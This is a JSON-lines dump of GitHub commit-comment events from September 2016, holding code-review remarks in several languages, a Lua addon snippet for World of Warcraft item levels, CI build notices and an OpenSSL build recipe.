{"id":"4539348343","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"minskliliya/ruby-course"},"payload":{"comment":{"id":18960620,"position":15,"line":15,"path":"lesson5/train.rb","commit_id":"55e81b030f8e748c152acfc297a47f81ca7a7f77","created_at":"2016-09-09T10:36:35Z","updated_at":"2016-09-09T10:36:35Z","body":"У тебя @@trains_number - это массив, ты же используешь его как хеш, в результате, у тебя получится разряженный массив. Т.е. если номер поезда будет 1000, то на 1000-м элементе будет объект, а первые 999 будут nil. И работать это будет только если номер поезда - это число. А ведь это не обязательно, в реальности номера бывают врод 86Б, так что скорее тут строка подойдет."}},"created_at":"2016-09-09T10:36:35Z"}
{"id":"4539348345","type":"CommitCommentEvent","actor":{"login":"leg883"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":18960619,"position":null,"line":null,"path":null,"commit_id":"85d3904846c21e2fc473ab787a70dd1156f2367c","created_at":"2016-09-09T10:36:35Z","updated_at":"2016-09-09T10:36:35Z","body":"`\r\nlocal tooltip = CreateFrame(\"GameTooltip\", \"TinyInspectTooltip\", UIParent, \"GameTooltipTemplate\")\r\n\r\n--获取unit物品等级 [考慮到本地物品緩存問題,加了第二返回值,沒得到等級返回1]\r\nlocal function GetUnitItemLevel(unit, id)\r\n    tooltip:SetOwner(UIParent, \"ANCHOR_NONE\")\r\n    tooltip:ClearLines()\r\n    tooltip:SetInventoryItem(unit, id)\r\n    local link = select(2, tooltip:GetItem())\r\n    if (link) then\r\n        local text, level\r\n        for i = 2, 4 do\r\n            text = _G[tooltip:GetName()..\"TextLeft\" .. i]:GetText() or \"\"\r\n            level = string.match(text, \"(%d+)$\")\r\n            if (level) then\r\n                return tonumber(level), 0\r\n            end\r\n        end\r\n        return 0, 1\r\n    end\r\n    return 0, 0\r\nend\r\n\r\n-- [API] 3-4肩 11-12戒指 13-14飾品 16-17主副\r\n function GetUnitEquippedLevel(unit)\r\n    local total, hasUnknown = 0, 0\r\n    local level, isUnknown\r\n    for i = 1, 15 do\r\n        level, isUnknown = GetUnitItemLevel(unit, i)\r\n        total = total + level\r\n        hasUnknown = hasUnknown + isUnknown\r\n\tend\r\n    local mainhand, secondhand\r\n    mainhand, isUnknown = GetUnitItemLevel(unit, 16)\r\n    hasUnknown = hasUnknown + isUnknown\r\n    secondhand, isUnknown = GetUnitItemLevel(unit, 17)\r\n    hasUnknown = hasUnknown + isUnknown\r\n    if (secondhand <= 0) then\r\n        total = total + mainhand * 2\r\n    else\r\n        total = total + mainhand + secondhand\r\n    end\r\n    return floor(total/16), hasUnknown\r\nend\r\n\r\n--顯示于InspectPaperDollFrame面板\r\nlocal function ShowEquippedLevel()\r\n    if (not InspectFrame.eqlevel) then\r\n        InspectFrame.eqlevel = InspectPaperDollFrame:CreateFontString(nil, \"OVERLAY\", \"GameFontNormalSmall\")\r\n        InspectFrame.eqlevel:SetPoint(\"RIGHT\", InspectFrame.TitleText, \"RIGHT\", 42, -38)\r\n        InspectFrame.eqlevel:SetTextColor(0, 0.8, 0.8)\r\n    end\r\n    local equippedLevel, hasUnknown = GetUnitEquippedLevel(InspectFrame.unit)\r\n    if (hasUnknown == 0) then\r\n        InspectFrame.eqlevel:SetText(format(STAT_AVERAGE_ITEM_LEVEL_EQUIPPED, equippedLevel))\r\n    else\r\n        InspectFrame.eqlevel:SetText(\"\")\r\n    end\r\nend\r\n\r\n--觀察時顯示\r\nlocal frame = CreateFrame(\"Frame\", nil, UIParent)\r\nframe:RegisterEvent(\"ADDON_LOADED\")\r\nframe:RegisterEvent(\"INSPECT_READY\")\r\nframe:RegisterEvent(\"UNIT_INVENTORY_CHANGED\")\r\nframe:SetScript(\"OnEvent\", function(self, event, arg1)\r\n    if (event == \"ADDON_LOADED\" and arg1 == \"Blizzard_InspectUI\") then\r\n        hooksecurefunc(\"InspectFrame_UpdateTabs\", function()\r\n            if (not InspectFrame.unit) then return end\r\n            ShowEquippedLevel()\r\n        end)\r\n        self:UnregisterEvent(\"ADDON_LOADED\")\r\n    elseif (event == \"UNIT_INVENTORY_CHANGED\") then\r\n        if (InspectFrame and arg1 == InspectFrame.unit) then\r\n            ShowEquippedLevel()\r\n        end\r\n    end\r\nend)\r\n\r\nTinyInspectDB = {}\r\n\r\n--更新周期\r\nlocal updateElapsed = 3600\r\n\r\n-- [API] 讀取或記錄數據\r\nfunction TinyInspectDBFactory(guid, eqlevel, name)\r\n    if (not TinyInspectDB[guid]) then\r\n        TinyInspectDB[guid] = { n = name, el = eqlevel, t = time() + updateElapsed }\r\n    end\r\n    if (TinyInspectDB[guid].t < time() and eqlevel) then\r\n        TinyInspectDB[guid].el = eqlevel\r\n        TinyInspectDB[guid].t = time() + updateElapsed\r\n    end\r\n    return TinyInspectDB[guid].el\r\nend\r\n\r\n--檢查數據\r\nlocal function needsUpdate(guid)\r\n    if (not TinyInspectDB[guid] or TinyInspectDB[guid].t < time()) then\r\n        return true\r\n    end\r\nend\r\n\r\n--選擇目標時 聊天框提示物品等級\r\nframe:RegisterEvent(\"UNIT_TARGET\")\r\nframe:HookScript(\"OnEvent\", function(self, event, arg1)\r\n    if (event == \"UNIT_TARGET\" and CanInspect(\"target\")) then\r\n        if (needsUpdate(UnitGUID(\"target\"))) then\r\n            NotifyInspect(\"target\")\r\n        end\r\n    elseif (event == \"INSPECT_READY\" and arg1 == UnitGUID(\"target\")) then\r\n        local equippedLevel, hasUnknown = GetUnitEquippedLevel(\"target\")\r\n        if (hasUnknown == 0) then\r\n            TinyInspectDBFactory(arg1, equippedLevel, UnitName(\"target\"))\r\n        end\r\n    end\r\nend)\r\n\r\n--鼠標滑過時 聊天框提示物品等級\r\nframe:RegisterEvent(\"UPDATE_MOUSEOVER_UNIT\")\r\nframe:HookScript(\"OnEvent\", function(self, event, arg1)\r\n    if (event == \"UPDATE_MOUSEOVER_UNIT\" and CanInspect(\"mouseover\")) then\r\n        if (needsUpdate(UnitGUID(\"mouseover\"))) then\r\n            NotifyInspect(\"mouseover\")\r\n        end\r\n    elseif (event == \"INSPECT_READY\" and arg1 == UnitGUID(\"mouseover\")) then\r\n        local equippedLevel, hasUnknown = GetUnitEquippedLevel(\"mouseover\")\r\n        if (hasUnknown == 0) then\r\n            TinyInspectDBFactory(arg1, equippedLevel, UnitName(\"mouseover\"))\r\n        end\r\n    end\r\nend)\r\n`"}},"created_at":"2016-09-09T10:36:35Z"}
{"id":"4539351205","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960626,"position":null,"line":null,"path":null,"commit_id":"6c06d228c6068d6a38b8b1edd21a0735b7770786","created_at":"2016-09-09T10:37:17Z","updated_at":"2016-09-09T10:37:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 976](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13020&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T10:37:17Z"}
{"id":"4539352606","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18960627,"position":null,"line":null,"path":null,"commit_id":"1d32a9a4173eace3df8494d0a6eea72b8611cf8a","created_at":"2016-09-09T10:37:38Z","updated_at":"2016-09-09T10:37:38Z","body":"\"beautification\" of course :)"}},"created_at":"2016-09-09T10:37:38Z"}
{"id":"4539353803","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18960629,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-09T10:37:57Z","updated_at":"2016-09-09T10:37:57Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.770.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76823&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:28"}},"created_at":"2016-09-09T10:37:57Z"}
{"id":"4539353947","type":"CommitCommentEvent","actor":{"login":"taleb700"},"repo":{"name":"taleb700/taleb100"},"payload":{"comment":{"id":18960631,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T10:37:59Z","updated_at":"2016-09-09T10:37:59Z","body":"Id: 232989645\r\n"}},"created_at":"2016-09-09T10:37:59Z"}
{"id":"4539356600","type":"CommitCommentEvent","actor":{"login":"1999"},"repo":{"name":"mmotkina/mocha-parallel-tests"},"payload":{"comment":{"id":18960636,"position":null,"line":null,"path":null,"commit_id":"c9b89b89bfd7cc771918b18b693aa1b2a226af89","created_at":"2016-09-09T10:38:41Z","updated_at":"2016-09-09T10:38:41Z","body":"cc @vitalets"}},"created_at":"2016-09-09T10:38:41Z"}
{"id":"4539359660","type":"CommitCommentEvent","actor":{"login":"chenwiebinztgame"},"repo":{"name":"chenwiebinztgame/awesome-python3-webapp"},"payload":{"comment":{"id":18960647,"position":null,"line":null,"path":null,"commit_id":"1a7198e811b1db396427159a3dec0bcde60aa891","created_at":"2016-09-09T10:39:27Z","updated_at":"2016-09-09T10:39:27Z","body":"11"}},"created_at":"2016-09-09T10:39:27Z"}
{"id":"4539362626","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18960652,"position":null,"line":null,"path":null,"commit_id":"1ad7e55dd198927214062980195a170b8adbcd77","created_at":"2016-09-09T10:40:14Z","updated_at":"2016-09-09T10:40:14Z","body":"love "}},"created_at":"2016-09-09T10:40:14Z"}
{"id":"4539370958","type":"CommitCommentEvent","actor":{"login":"pchiusano"},"repo":{"name":"unisonweb/unison"},"payload":{"comment":{"id":18960675,"position":39,"line":33,"path":"node/src/Unison/Runtime/Cryptography.hs","commit_id":"8c99adb495e166b66cb6447c0465ac50da0aa6f0","created_at":"2016-09-09T10:42:15Z","updated_at":"2016-09-09T10:42:15Z","body":"👍\n\nOn Thursday, September 8, 2016, Tim McIver <notifications@github.com> wrote:\n\n> Thanks for the link to the conversation. I'll look into the references\n> that Riastradh mentions and take a look at the libsodium library (I guess\n> it's saltine <https://hackage.haskell.org/package/saltine>). Once I think\n> I understand what needs to be done we can discuss an approach.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/unisonweb/unison/commit/8c99adb495e166b66cb6447c0465ac50da0aa6f0#commitcomment-18956531>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAArQhT4nQ7zMTY5Ug9CGit6kn0xhX_lks5qoMGPgaJpZM4J4cNB>\n> .\n>\n"}},"created_at":"2016-09-09T10:42:15Z"}
{"id":"4539375585","type":"CommitCommentEvent","actor":{"login":"georgekpg"},"repo":{"name":"i2biz/django-enumfield"},"payload":{"comment":{"id":18960684,"position":null,"line":null,"path":null,"commit_id":"677e77c5ed9034e635dd8f56b18f662e95d2f675","created_at":"2016-09-09T10:43:28Z","updated_at":"2016-09-09T10:43:28Z","body":"Why does you call validators.validate_available_choice from get_db_prep_value instead of validate?"}},"created_at":"2016-09-09T10:43:28Z"}
{"id":"4539377973","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18960694,"position":1,"line":1,"path":"1264. Трудовые будни","commit_id":"4e37c3ae6f437e976b7824acc65ae107ab5e6899","created_at":"2016-09-09T10:44:02Z","updated_at":"2016-09-09T10:44:02Z","body":"Ну во-первых, там WrongAnswer на первом тесте."}},"created_at":"2016-09-09T10:44:02Z"}
{"id":"4539378260","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18960696,"position":100,"line":229,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-09T10:44:06Z","updated_at":"2016-09-09T10:44:06Z","body":"The only possible error with errno is \"Address family not supported\", and this will never happen because we explicitly pass AF_INET/AF_INET6.\r\n\r\nI can add the check to all four call sites if you still want it, but it will add a lot of dead code."}},"created_at":"2016-09-09T10:44:06Z"}
{"id":"4539378893","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"chriskohlhoff/asio"},"payload":{"comment":{"id":18960699,"position":null,"line":null,"path":null,"commit_id":"062b19c97bb85f4625b46f93ee19b234948ff235","created_at":"2016-09-09T10:44:15Z","updated_at":"2016-09-09T10:44:15Z","body":"*From Bug Report 12238 email*:\r\n\r\n> Comment (by anonymous):\r\n>\r\n> can anybody please test the patch?\r\n> https://github.com/chriskohlhoff/asio/commit/062b19c97bb85f4625b46f93ee19b234948ff235\r\n\r\nYes, but I'm not a Boost user (I'm an OpenSSL guy). Can you provide a prescriptive recipe? By prescriptive recipe, I mean something like (in the context of OpenSSL):\r\n\r\n```\r\nwget https://www.openssl.org/source/openssl-1.1.0.tar.gz\r\ntar xzf openssl-1.1.0.tar.gz\r\ncd openssl-1.1.0.tar.gz\r\n\r\n./config linux-x86_64 no-ssl2 no-ssl3 no-comp shared enable-ec_nistp_64_gcc_128\r\nmake\r\nmake test\r\nsudo make install\r\n```\r\n\r\nThat's effectively my recipe to build OpenSSL. OpenSSL will define `OPENSSL_NO_SSL2`, `OPENSSL_NO_SSL3` and `OPENSSL_NO_COMP`."}},"created_at":"2016-09-09T10:44:15Z"}
{"id":"4539380361","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18960704,"position":10,"line":10,"path":"1264. Трудовые будни","commit_id":"4e37c3ae6f437e976b7824acc65ae107ab5e6899","created_at":"2016-09-09T10:44:37Z","updated_at":"2016-09-09T10:44:37Z","body":"Не надо стараться уместить код в одну строчку, это вообще не читабельно."}},"created_at":"2016-09-09T10:44:37Z"}
{"id":"4539380692","type":"CommitCommentEvent","actor":{"login":"iqramroslan"},"repo":{"name":"jotux/Steward-Platform-Forward-Kinematics-Solver"},"payload":{"comment":{"id":18960705,"position":null,"line":null,"path":null,"commit_id":"ad27cf77a0b2e7dd7faecdb0e9de3204ee5ab858","created_at":"2016-09-09T10:44:42Z","updated_at":"2016-09-09T10:44:42Z","body":"i got some problem with callback function.\r\nError in stew (line 402)\r\n    solve_forward();\r\n \r\nError while evaluating uicontrol Callback"}},"created_at":"2016-09-09T10:44:42Z"}
{"id":"4539383445","type":"CommitCommentEvent","actor":{"login":"rilwis"},"repo":{"name":"rilwis/meta-box"},"payload":{"comment":{"id":18960712,"position":null,"line":null,"path":null,"commit_id":"96f59627bc6666799fbb911aa81a28c0a67b5df3","created_at":"2016-09-09T10:45:24Z","updated_at":"2016-09-09T10:45:24Z","body":"Hmm, I've just encountered a problem with this change.\r\n\r\nIf users register meta box in the admin only, then `false === $field`. In that case, we need to use the `RWMB_Helper::meta`."}},"created_at":"2016-09-09T10:45:24Z"}
{"id":"4539384500","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18960714,"position":4,"line":4,"path":"db/migrate/20160908175106_create_tickets.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T10:45:40Z","updated_at":"2016-09-09T10:45:40Z","body":"Есть удобный метод для объявления внешних ключей: http://api.rubyonrails.org/classes/ActiveRecord/ConnectionAdapters/TableDefinition.html#method-i-references\r\n\r\nОн хорош тем что автоматически добавляет индекс на колонку в базе данных."}},"created_at":"2016-09-09T10:45:40Z"}
{"id":"4539385579","type":"CommitCommentEvent","actor":{"login":"hokorobi"},"repo":{"name":"hokorobi/plantuml-syntax"},"payload":{"comment":{"id":18960716,"position":null,"line":null,"path":null,"commit_id":"fc7a8ca8bb93edd01138ad8c7ce3974201b3ae9e","created_at":"2016-09-09T10:45:56Z","updated_at":"2016-09-09T10:45:56Z","body":"A similar thing is often the case for me :)"}},"created_at":"2016-09-09T10:45:56Z"}
{"id":"4539387712","type":"CommitCommentEvent","actor":{"login":"jdesboeufs"},"repo":{"name":"sgmap/beta.gouv.fr"},"payload":{"comment":{"id":18960717,"position":4,"line":6,"path":"_author/david.md","commit_id":"8ecac7530e0d47ee6a34f9b4bae047cdc7800fbd","created_at":"2016-09-09T10:46:26Z","updated_at":"2016-09-09T10:46:26Z","body":"independant/octo"}},"created_at":"2016-09-09T10:46:26Z"}
{"id":"4539389897","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960721,"position":null,"line":null,"path":null,"commit_id":"6c06d228c6068d6a38b8b1edd21a0735b7770786","created_at":"2016-09-09T10:47:00Z","updated_at":"2016-09-09T10:47:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 976](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13020&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:43"}},"created_at":"2016-09-09T10:47:00Z"}
{"id":"4539392193","type":"CommitCommentEvent","actor":{"login":"fyodorovski"},"repo":{"name":"daniil-timofeev/reactors"},"payload":{"comment":{"id":18960723,"position":6,"line":634,"path":"reactors-core/src/main/scala/io/reactors/Events.scala","commit_id":"38a018f5ac4636573b09e844da3f14ad02fb1a2b","created_at":"2016-09-09T10:47:41Z","updated_at":"2016-09-09T10:47:41Z","body":"Nice fix!\r\nNote that you would have to submit the pull request to the main reactors repository (if you want to contribute it)."}},"created_at":"2016-09-09T10:47:41Z"}
{"id":"4539395577","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Diogo-Ferreira/opentheater"},"payload":{"comment":{"id":18960727,"position":null,"line":null,"path":null,"commit_id":"4f0b773ebed23731fb0f3dfbe09eceef0a176d18","created_at":"2016-09-09T10:48:34Z","updated_at":"2016-09-09T10:48:34Z","body":"Il y a un peu plus à faire pour que ça fonctionne...\r\n```\r\nannounceList: [[\"ws://opentheater.infinit8.io:8998\"]]\r\n```"}},"created_at":"2016-09-09T10:48:34Z"}
{"id":"4539397906","type":"CommitCommentEvent","actor":{"login":"jbzdak"},"repo":{"name":"i2biz/django-enumfield"},"payload":{"comment":{"id":18960736,"position":null,"line":null,"path":null,"commit_id":"677e77c5ed9034e635dd8f56b18f662e95d2f675","created_at":"2016-09-09T10:49:10Z","updated_at":"2016-09-09T10:49:10Z","body":"AFAIK validate is called only in context of form validation, and Enumfield should enforce proper values are stored to DB irregardles if they came from form or from other source. get_db_prep_value makes any save call fail if value is not proper. \r\n\r\n"}},"created_at":"2016-09-09T10:49:10Z"}
{"id":"4539401141","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960748,"position":null,"line":null,"path":null,"commit_id":"5eb9d4229f67d17596e3ae30d2500ae37d3903ad","created_at":"2016-09-09T10:49:59Z","updated_at":"2016-09-09T10:49:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 977](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13023&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T10:49:59Z"}
{"id":"4539403642","type":"CommitCommentEvent","actor":{"login":"eafzali"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18960753,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-09T10:50:38Z","updated_at":"2016-09-09T10:50:38Z","body":"The CSS link should be inserted in the header however we can do it dynamically using javascript like this:\r\n```js\r\n    var link = document.createElement('link');\r\n    link.rel = 'stylesheet';\r\n    link.href = 'https://cdnjs.cloudflare.com/ajax/libs/Swiper/3.3.1/css/swiper.min.css';\r\n    document.head.appendChild(link);\r\n```\r\nBut it's optional users can use their own stylesheets maybe :-/"}},"created_at":"2016-09-09T10:50:38Z"}
{"id":"4539404534","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18960755,"position":10,"line":10,"path":"1264. Трудовые будни","commit_id":"4e37c3ae6f437e976b7824acc65ae107ab5e6899","created_at":"2016-09-09T10:50:51Z","updated_at":"2016-09-09T10:50:51Z","body":"Есть метод TryParse с out параметром. Он позволит избежать построение логики на Exception. И то же самое можно будет написать на условиях. Все же Exception более тяжеловесный объект."}},"created_at":"2016-09-09T10:50:51Z"}
{"id":"4539404545","type":"CommitCommentEvent","actor":{"login":"bolkedebruin"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":18960756,"position":5,"line":58,"path":"airflow/contrib/operators/ssh_execute_operator.py","commit_id":"32f3c1c5d4acac56a1ebdc36cd9a8c71ace35e5c","created_at":"2016-09-09T10:50:51Z","updated_at":"2016-09-09T10:50:51Z","body":"-t is not equal to --tmpdir. Have you considered that @forevernull, @msumit? At a minimum this should be documented in UPDATING.md and/or the docs for this operator."}},"created_at":"2016-09-09T10:50:51Z"}
{"id":"4539409081","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18960762,"position":11,"line":11,"path":"1264. Трудовые будни","commit_id":"4e37c3ae6f437e976b7824acc65ae107ab5e6899","created_at":"2016-09-09T10:52:05Z","updated_at":"2016-09-09T10:52:05Z","body":"Это проверка в случае Timus лишняя. Но за инициативу - молодец, вообще практика правильная."}},"created_at":"2016-09-09T10:52:05Z"}
{"id":"4539410982","type":"CommitCommentEvent","actor":{"login":"georgekpg"},"repo":{"name":"i2biz/django-enumfield"},"payload":{"comment":{"id":18960770,"position":null,"line":null,"path":null,"commit_id":"677e77c5ed9034e635dd8f56b18f662e95d2f675","created_at":"2016-09-09T10:52:35Z","updated_at":"2016-09-09T10:52:35Z","body":"Ok, I see, thanks for your answer"}},"created_at":"2016-09-09T10:52:35Z"}
{"id":"4539411245","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"JacksonFaller/.Net"},"payload":{"comment":{"id":18960771,"position":9,"line":9,"path":"1264. Трудовые будни","commit_id":"4e37c3ae6f437e976b7824acc65ae107ab5e6899","created_at":"2016-09-09T10:52:39Z","updated_at":"2016-09-09T10:52:39Z","body":"Это не нужно тебе сразу будет переданы параметры в тимусе."}},"created_at":"2016-09-09T10:52:39Z"}
{"id":"4539411842","type":"CommitCommentEvent","actor":{"login":"okokookokok"},"repo":{"name":"Kjagd/dotarun"},"payload":{"comment":{"id":18960772,"position":null,"line":null,"path":null,"commit_id":"6210d45f75f9bd9261855b2730ceaa480cd4d407","created_at":"2016-09-09T10:52:48Z","updated_at":"2016-09-09T10:52:48Z","body":"Classic wait a frame problem\r\nAnother thing: Should probably not charge yourself if you are in front, although hilarious"}},"created_at":"2016-09-09T10:52:48Z"}
{"id":"4539413912","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18960774,"position":null,"line":null,"path":null,"commit_id":"3282cfb5713a4a8dd1301ef09634762f17555591","created_at":"2016-09-09T10:53:20Z","updated_at":"2016-09-09T10:53:20Z","body":"Então só rectificas o Cancro?"}},"created_at":"2016-09-09T10:53:20Z"}
{"id":"4539415548","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18960778,"position":4,"line":4,"path":"db/migrate/20160908180036_create_railway_stations_routes.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T10:53:46Z","updated_at":"2016-09-09T10:53:46Z","body":"`index: true` по умолчанию, можно не писать."}},"created_at":"2016-09-09T10:53:46Z"}
{"id":"4539423665","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18960796,"position":null,"line":null,"path":null,"commit_id":"3282cfb5713a4a8dd1301ef09634762f17555591","created_at":"2016-09-09T10:55:51Z","updated_at":"2016-09-09T10:55:51Z","body":"Boas...\r\nP enquanto sim.\r\nNão tenho a certeza disto, portanto só quando compilar uma nova rom e testar é que actualizo o resto."}},"created_at":"2016-09-09T10:55:51Z"}
{"id":"4539424380","type":"CommitCommentEvent","actor":{"login":"DASCRSB"},"repo":{"name":"DASCRSB/Hi"},"payload":{"comment":{"id":18960801,"position":1,"line":1,"path":"README.md","commit_id":"f39a245384c1517cdc96d369b5f43947aa0aa20d","created_at":"2016-09-09T10:56:02Z","updated_at":"2016-09-09T10:56:02Z","body":"u want to know about myself hun\r\n"}},"created_at":"2016-09-09T10:56:02Z"}
{"id":"4539424913","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18960804,"position":4,"line":4,"path":"db/migrate/20160908180036_create_railway_stations_routes.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T10:56:12Z","updated_at":"2016-09-09T10:56:12Z","body":"А вот `null: false` не помешает."}},"created_at":"2016-09-09T10:56:12Z"}
{"id":"4539426736","type":"CommitCommentEvent","actor":{"login":"JamesRamm"},"repo":{"name":"JamesRamm/leaflet-sidenav"},"payload":{"comment":{"id":18960808,"position":null,"line":null,"path":null,"commit_id":"ad6a440288eea4627514f048c6331c7a620a357b","created_at":"2016-09-09T10:56:39Z","updated_at":"2016-09-09T10:56:39Z","body":"hi @noerw!\r\nI was considering push to your fork since movement (At least on areas i need) seems quite slow on Turbo87. However I wasnt sure whether my changes would be interesting to you and I wanted things to happen ASAP as I am using it in another project (https://github.com/JamesRamm/MapThing) and installation via npm and being able to `require` are fairly critical for that. \r\n\r\nChanges I wanted to do but I thought would be contentious:\r\n\r\n- rename to `leaflet-sidenav` as it is cleaner (IMO, it wouldve been better if `sidebarv2` had just been a continuation of `leaflet-sidebar`)\r\n- drop all support except leaflet as I'm only interested in leaflet and porting all changes to the jquery side would be a pain!\r\n- drop usage of `gulp` as, IMO, just using `npm` scripts is easier and introduces way less dependencies and difficulties\r\n- get it published on npm asap\r\n- add possibility to set the `header` \r\n\r\n"}},"created_at":"2016-09-09T10:56:39Z"}
{"id":"4539428681","type":"CommitCommentEvent","actor":{"login":"Venkadramanan"},"repo":{"name":"Venkadramanan/TreatMate"},"payload":{"comment":{"id":18960815,"position":null,"line":null,"path":null,"commit_id":"b0e369dd0745e29617225c8d1496617b0ec45f81","created_at":"2016-09-09T10:57:11Z","updated_at":"2016-09-09T10:57:11Z","body":"First We doing the Review Rater Module with Sentiment analysis "}},"created_at":"2016-09-09T10:57:11Z"}
{"id":"4539431620","type":"CommitCommentEvent","actor":{"login":"Gopalpanday"},"repo":{"name":"Gopalpanday/Event-Management-System"},"payload":{"comment":{"id":18960820,"position":null,"line":null,"path":null,"commit_id":"21a099dc4bfede64ea7980b06473c61b339e19af","created_at":"2016-09-09T10:58:00Z","updated_at":"2016-09-09T10:58:00Z","body":"Reuired Eclipse tool to run this project properly"}},"created_at":"2016-09-09T10:58:00Z"}
{"id":"4539431889","type":"CommitCommentEvent","actor":{"login":"kabalin"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960822,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T10:58:03Z","updated_at":"2016-09-09T10:58:03Z","body":"@config-i1 It seems like your commit includes unresolved conflicts in it ;)"}},"created_at":"2016-09-09T10:58:03Z"}
{"id":"4539435487","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18960833,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-09T10:58:58Z","updated_at":"2016-09-09T10:58:58Z","body":"Ehsan, documemt how to insert it manually, but give the default option to\ninsert it dynamically.\n\nOn 9 Sep 2016 10:50 p.m., \"Ehsan Afzali\" <notifications@github.com> wrote:\n\n> The CSS link should be inserted in the header however we can do it\n> dynamically using javascript like this:\n>\n>     var link = document.createElement('link');\n>     link.rel = 'stylesheet';\n>     link.href = 'https://cdnjs.cloudflare.com/ajax/libs/Swiper/3.3.1/css/swiper.min.css';\n>     document.head.appendChild(link);\n>\n> But it's optional users can use their own stylesheets maybe :-/\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hubsy-io/timelapse/commit/6cdabc48ff36826f18d5c106abeabedada461dc0#commitcomment-18960753>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFpsjBxVk01PVrx1xug4RD6kgBVG9yxuks5qoTn-gaJpZM4J3ZbV>\n> .\n>\n"}},"created_at":"2016-09-09T10:58:58Z"}
{"id":"4539436573","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18960838,"position":null,"line":null,"path":null,"commit_id":"3282cfb5713a4a8dd1301ef09634762f17555591","created_at":"2016-09-09T10:59:16Z","updated_at":"2016-09-09T10:59:16Z","body":"Pois mas às vezes só alteras settings no Cancro por isso perguntei... Este bug é geral eu já tinha reparado. Se puderes passa-me informação por PM no forúm de compilar a rom pois tenho o mesmo erro no Hermes e gostaria de experimentar."}},"created_at":"2016-09-09T10:59:16Z"}
